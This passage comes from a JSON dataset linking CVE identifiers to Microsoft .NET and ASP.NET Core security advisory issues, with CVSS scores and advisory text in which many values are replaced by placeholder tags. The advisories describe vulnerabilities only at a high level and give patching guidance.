  87714. "CVE_ID": "CVE-2017-11883",
  87715. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/278",
  87716. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/278",
  87717. "Repo_new": "aspnet/announcements",
  87718. "Issue_Created_At": "2017-11-14T15:25:03Z",
  87719. "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
  87720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87721. "severity": "HIGH",
  87722. "baseScore": 7.5,
  87723. "impactScore": 3.6,
  87724. "exploitabilityScore": 3.9
  87725. },
  87726. {
  87727. "CVE_ID": "CVE-2018-8269",
  87728. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/385",
  87729. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/385",
  87730. "Repo_new": "aspnet/announcements",
  87731. "Issue_Created_At": "2019-09-10T17:02:22Z",
  87732. "description": "Microsoft Security Advisory CVETAG : Denial of Service Vulnerability in APITAG Microsoft Security Advisory CVETAG : Denial of Service Vulnerability in APITAG APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service attack in the Microsoft APITAG library used in ASP.NET could cause a denial of service against an APITAG web application. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the APITAG application. The update addresses the vulnerability by updating the version of APITAG ASP.NET Core uses. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not use ASP.NET Core's APITAG implementation or your application does not use Azure Storage to store data protect keys you are not affected. APITAG APITAG Affected software Any ASP.NET Core based application that uses APITAG or APITAG with a vulnerable version listed below. Any ASP.NET Core based application that uses the APITAG shared framework with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG | APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I know if I am affected? .NET Core has two types of dependencies: direct and transitive. Direct dependencies are dependencies where you specifically add a package to your project, transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, the APITAG package depends on the APITAG package. When you add a dependency on APITAG in your project, you're taking a transitive dependency on APITAG . Any application that has a direct or transitive dependency on the affected package affected software can be exposed to the vulnerability if it does not meet any of the mitigation factors mitigation factors . APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. The affected assemblies are also available separately as a APITAG package. Even if you are not using APITAG or APITAG directly you may still be affected if either package is a transitive dependency. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends on APITAG , your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Eric Scott URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87733. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87734. "severity": "HIGH",
  87735. "baseScore": 7.5,
  87736. "impactScore": 3.6,
  87737. "exploitabilityScore": 3.9
  87738. },
  87739. {
  87740. "CVE_ID": "CVE-2020-1597",
  87741. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/162",
  87742. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/162",
  87743. "Repo_new": "dotnet/announcements",
  87744. "Issue_Created_At": "2020-08-11T17:08:44Z",
  87745. "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87746. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87747. "severity": "HIGH",
  87748. "baseScore": 7.5,
  87749. "impactScore": 3.6,
  87750. "exploitabilityScore": 3.9
  87751. },
  87752. {
  87753. "CVE_ID": "CVE-2022-24512",
  87754. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/213",
  87755. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/213",
  87756. "Repo_new": "dotnet/announcements",
  87757. "Issue_Created_At": "2022-03-08T18:35:34Z",
  87758. "description": "Microsoft Security Advisory CVETAG | .NET Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A Remote Code Execution vulnerability exists in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG where a stack buffer overrun occurs in .NET Double Parse routine. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET NUMBERTAG NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87759. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
  87760. "severity": "MEDIUM",
  87761. "baseScore": 6.3,
  87762. "impactScore": 3.4,
  87763. "exploitabilityScore": 2.8
  87764. },
  87765. {
  87766. "CVE_ID": "CVE-2020-1147",
  87767. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/159",
  87768. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/159",
  87769. "Repo_new": "dotnet/announcements",
  87770. "Issue_Created_At": "2020-07-14T17:06:53Z",
  87771. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in .NET software when the software fails to check the source markup of an XML file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to an ASP.NET Core application, or other application that parses certain types of XML. The security update addresses the vulnerability by restricting the types that are allowed to be present in the XML payload. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG Preview NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87772. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87773. "severity": "HIGH",
  87774. "baseScore": 7.8,
  87775. "impactScore": 5.9,
  87776. "exploitabilityScore": 1.8
  87777. },
  87778. {
  87779. "CVE_ID": "CVE-2019-0981",
  87780. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/113",
  87781. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/113",
  87782. "Repo_new": "dotnet/announcements",
  87783. "Issue_Created_At": "2019-05-14T17:06:24Z",
  87784. "description": "Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when .NET Core and ASP.NET Core improperly handle web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core and ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to a .NET Core application. The update addresses the vulnerability by correcting how .NET Core and ASP.NET Core web applications handle web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors There are no mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG If your version of .NET Core does not support the APITAG command then you have either .NET Core NUMBERTAG or .NET Core NUMBERTAG installed. For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from URLTAG PATHTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK you should restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87785. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87786. "severity": "HIGH",
  87787. "baseScore": 7.5,
  87788. "impactScore": 3.6,
  87789. "exploitabilityScore": 3.9
  87790. },
  87791. {
  87792. "CVE_ID": "CVE-2019-1075",
  87793. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/373",
  87794. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/373",
  87795. "Repo_new": "aspnet/announcements",
  87796. "Issue_Created_At": "2019-07-09T17:01:09Z",
  87797. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Spoofing Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Spoofing Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a spoofing vulnerability that exists in ASP.NET Core that could lead to an open redirect. An attacker who successfully exploited the vulnerability could redirect a targeted user to a malicious website. To exploit the vulnerability, an attacker could send a link that has a specially crafted URL and convince the user to click the link. The update addresses the vulnerability by correcting how ASP.NET Core parses URLs. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any ASP.NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgements Reported through Datalust External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87798. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87799. "severity": "MEDIUM",
  87800. "baseScore": 6.1,
  87801. "impactScore": 2.7,
  87802. "exploitabilityScore": 2.8
  87803. },
  87804. {
  87805. "CVE_ID": "CVE-2019-0980",
  87806. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/112",
  87807. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/112",
  87808. "Repo_new": "dotnet/announcements",
  87809. "Issue_Created_At": "2019-05-14T17:04:45Z",
  87810. "description": "Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when .NET Core and ASP.NET Core improperly handle web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core and ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to a .NET Core application. The update addresses the vulnerability by correcting how .NET Core and ASP.NET Core web applications handle web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors There are no mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG If your version of .NET Core does not support the APITAG command then you have either .NET Core NUMBERTAG or .NET Core NUMBERTAG installed. For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from URLTAG PATHTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK you should restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG 